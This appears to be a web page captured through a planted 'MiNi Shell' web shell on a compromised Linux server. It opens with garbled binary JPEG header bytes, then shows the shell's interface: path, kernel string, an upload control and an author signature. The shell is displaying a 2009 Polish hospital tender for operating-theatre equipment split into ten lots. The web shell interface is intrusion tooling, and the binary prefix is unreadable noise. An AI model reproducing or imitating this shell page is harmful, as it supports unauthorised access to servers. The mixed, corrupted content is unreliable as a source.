JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090518/153232-N-2009.html

<p class="kh_header"><b>Poznań: Dostawa wyposażenia dla bloku operacyjnego</b><br>
<b>Numer ogłoszenia: 153232 - 2009; data zamieszczenia: 18.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład  Opieki Zdrowotnej Poznań - Stare Miasto , ul. Szkolna 8/12, 61-833 Poznań, woj. wielkopolskie, faks 061 858-56-23.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia dla bloku operacyjnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa wyposażenia dla bloku operacyjnego z podziałem na 10 zadań:
Zadanie nr 1-  aparat do diatermii chirurgicznej szt 1 

Zadanie nr 2-    ssak chirurgiczny  szt. 2      

Zadanie  nr 3-	 Wózek do przechowywania i transportu brudnej bielizny szt 4
Zadanie  nr 4-	Wózek zabiegowy szt 5
Zadanie nr 5	Fartuch XXL RTG szt 6
	            Osłona na tarczycę szt 6
Zadanie nr 6-	Szafki ubraniowe metalowe 2-drzwiowe szt 15
Zadanie nr 7-	Wózek do mycia i dezynfekcji z wyposażeniem szt 3
                         Mop bawełniany 40cm z kieszeniami  szt 50


Zadanie nr 8 -Szafa termostatyczna do przechowywania płynów infuzyjnych szt 3
Zadanie nr 9-	Wiertarka chirurgiczna z oprzyrządowaniem kpl 1
Zadanie nr 10 -	Lampy bakteriobójcze szt 16.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu:
1.1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
1.2	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia - tj w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali co najmniej dwie dostawy o następującym rodzaju i wartości dla każdej z nich: 



Numer i nazwa zadania	Rodzaj dostawy	Wartość dostawy w  zł
Zadanie nr 1
	     aparat do diatermii chirurgicznej             30 000,00
Zadanie nr 2	    ssak chirurgiczny                      2 000,00
Zadanie  nr 3 Wózek do przechowywania i transportu brudnej bielizny 8 000,00
Zadanie  nr 4	   Wózek zabiegowy 	          10 000,00
Zadanie nr 5	Fartuch XXL RTG 
                    Osłona na tarczycę                    3000,00 w zakresie fartuchów RTG	                                                                                           
Zadanie nr 6	Szafki ubraniowe metalowe 2-drzwiowe 	3 000,00
Zadanie nr 7	Wózek do mycia i dezynfekcji z wyposażeniem,                     mop bawełniany 	                                                                 6 000,00   
                                                                                   w zakresie wózka      
Zadanie nr 8 	Szafa termostatyczna do przechowywania płynów infuzyjnych 	                                                                             5 000,00
Zadanie nr 9	Wiertarka chirurgiczna z oprzyrządowaniem 	30 000,00
Zadanie nr 10	Lampy bakteriobójcze	                          8 000,00 


1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 

1.4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
 	
       2.  Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty określone w pkt. VI niniejszej specyfikacji -Wykaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu-metodą warunku granicznego - spełnia/niespełnia. Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww warunki Wykonawca spełnia.
3.  Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
4.     Zamawiający odrzuci ofertę, jeżeli:
4.1	jest niezgodna z ustawą,
4.2	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Pzp,
4.3	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji,
4.4	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
4.5	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
4.6	zawiera błędy w obliczeniu ceny,
4.7	wykonawca w terminie 3 dni od dnia doręczenia  zawiadomienia nie zgodził się na poprawienie omyłki o której mowa w art. 87 ust. 2 pkt. 3 Pzp,
4.8	jest nieważna na podstawie odrębnych przepisów.

5.  O wykluczeniu z postępowania oraz o odrzuceniu ofert Wykonawcy zostaną zawiadomieni niezwłocznie po dokonaniu wyboru najkorzystniejszej oferty. Zawiadomienie zawierać będzie uzasadnienie faktyczne i prawne..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełnienia warunków określonych w pkt. V Wykonawca winien dostarczyć następujące dokumenty i oświadczenia:
1.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 

2.	wykazu wykonanych dostaw,  w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - wykaz zrealizowanych zamówień należy złożyć wg wzoru stanowiącego załącznik Nr 5 do niniejszej SIWZ. Do wykazu winny być dołączone dokumenty potwierdzające, że wymienione w wykazie dostawy został wykonane należycie - zgodnie z warunkiem opisanym w punkcie V pkt 1 ppkt 1.2. SIWZ, 

3.	oświadczenia o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne na podstawie art. 22 ust. 1  ustawy Prawo zamówień publicznych , z wykorzystaniem wzoru - załącznik nr 4 do SIWZ.

4 . W celu potwierdzenia, że oferowana dostawa odpowiada wymaganiom określonym przez Zamawiającego, do oferty należy dołączyć: 

4.1.	Opis przedmiotu zamówienia z wykorzystaniem załącznika nr 6.1 - 6.10 do SIWZ. Brak wypełnienia pozycji w kolumnie (Oferowany parametr)będzie traktowany jako brak danego parametru w oferowanym przedmiocie zamówienia. W przypadku niezgodności oferowanych przez Wykonawcę parametrów technicznych na wybrany przedmiot zamówienia oferta zostanie odrzucona.
Na potwierdzenie spełnienia parametrów technicznych wymaganych przez Zamawiającego Wykonawca winien załączyć opis przedmiotu zamówienia w formie np.: wydruków ze stron internetowych, folderów, katalogów, instrukcji obsługi. 
UWAGA! Na wszystkich dołączonych do oferty opisach ( wydruki ze stron internetowych, foldery, katalogi, instrukcje obsługi) należy wyraźnie zaznaczyć, którego zadania i pozycji w wybranym przez Wykonawcę zadaniu ten opis dotyczy.

4.2  Dokumenty potwierdzające, że oferowany przedmiot zamówienia spełnia warunki dopuszczenia go do obrotu medycznego i stosowania przy udzielaniu świadczeń zdrowotnych (certyfikat CE/ deklaracja zgodności/ wpis lub zgłoszenie do Rejestru Wyrobów Medycznych), zgodnie z obowiązującymi przepisami określonymi w ustawie z dnia 20.04.2004r. o wyrobach medycznych (Dz. U. Nr 93 poz. 896 i przepisy wykonawcze do tej ustawy). 
Pkt. VI ppkt. 4.2 SIWZ dotyczy tylko tego przedmiotu zamówienia, który wymaga takiego wpisu, w przypadku przedmiotu zamówienia nie będącego wyrobem medycznym Wykonawca winien dołączyć oświadczenie, iż oferowany przedmiot zamówienia jest dopuszczony w zakresie jego bezpieczeństwa do obrotu i stosowania i nie są wymagane dokumenty, tj. (certyfikat CE/ deklaracja zgodności/ wpis lub zgłoszenie do Rejestru Wyrobów Medycznych).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital-strusia.poznan.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> podanym w pkt I 1
Kontakt   ul. Szwajcarska 3  61-285 Poznań, Dział Inwestycji.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2009 godzina 09:30, miejsce: Zakład Opieki Zdrowotnej Poznań - Stare Miasto, ul. Szwajcarska 3, 61-285 Poznań, Kancelaria - pok. nr 239..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Aparat do diatermii chirurgicznej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparat do diatermii chirurgicznej szt 1
Generator elektrochirurgiczny
Tryb bipolarny(3 efekty)
Precise
Standard
Macro
Cięcie  monopolarne ( 3 tryby)
Low
Pure
Blend
Koagulacja monopolarna (3 tryby)
desiccate
Fulgurate
Spray.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ssak chirurgiczny.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ssak chirurgiczny  szt 2
 Montowany na szynę modura. Wyposażony  w mocownik szynowy aluminiowy dokręcany od spodu oraz dren próżniowy zbrojony z końcówką wtykową do gniazda próżni..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wózek do przechowywania i transportu brudnej bielizny.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wózek do przechowywania i transportu brudnej bielizny szt 4
Wykonany całkowicie z blachy ze stopu lekkiego AIMg3 poddanej anodyzacji ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wózek zabiegowy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wózek zabiegowy szt 5
z wyposażeniem:
- zestaw dozowników na materiały opatrunkowo- zabiegowe na stelażu metalowym -3 rzędy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Fartuch XXL RTG  i osłona na tarczycę..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fartuch XXL RTG  szt 6
Fartuch jednostronny chirurgiczny (możliwość rozpięcia i zsunięcia na ziemię fartucha spod sterylnej odzieży bez konieczności jej zdejmowania) zabezpieczający przód i łopatki użytkownika.
Osłona na tarczycę szt 6
Składa się z kołnierza zapinanego na rzep oraz śliniaka 12 (kołnierz z doszytym śliniakiem o długości 12 cm).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> szafki ubraniowe metalowe 2-drzwiowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szafki ubraniowe metalowe 2-drzwiowe   szt 15
szerokość szafy 600 mm, wysokość 1800mm.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wózek do mycia i dezynfekcji z wyposażeniem.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wózek do mycia i dezynfekcji z wyposażeniem szt 3 
półka/kuweta górna w kolorze niebieskim  z czterema wiaderkami o pojemności 6 litrów w kolorach :niebieskim, żółtym, czerwonym i białym.
Mop bawełniany 40 cm z kieszeniami-50 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.10.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Szafa termostatyczna do przechowywania płynów infuzyjnych..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szafa termostatyczna do przechowywania płynów infuzyjnych -szt 3 :
 Jednokomorowa,
Pojemność 150 l.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.11.30-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Wiertarka chirurgiczna z oprzyrządowaniem.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wiertarka chirurgiczna z oprzyrządowaniem kpl 1
Rękojeść napędu+pokrywa rękojeści /autoklawowalne/,Uchwyty wiertarskie,Uchwyt do drutów Kirschnera,Końcówka piły oscylacyjnej poprzecznej,Końcówka piły posuwisto-zwrotnej oscylacyjnej,Ładowarka i moduł zasilający/baterie.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Lampy bakteriobójcze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przepływowa lampa do dezynfekcji powietrza w sposób ciągły w obecności personelu medycznego i pacjenta  szt 15
Lampa bakteriobójcza bezpośredniego działania -szt 1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.51.50.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com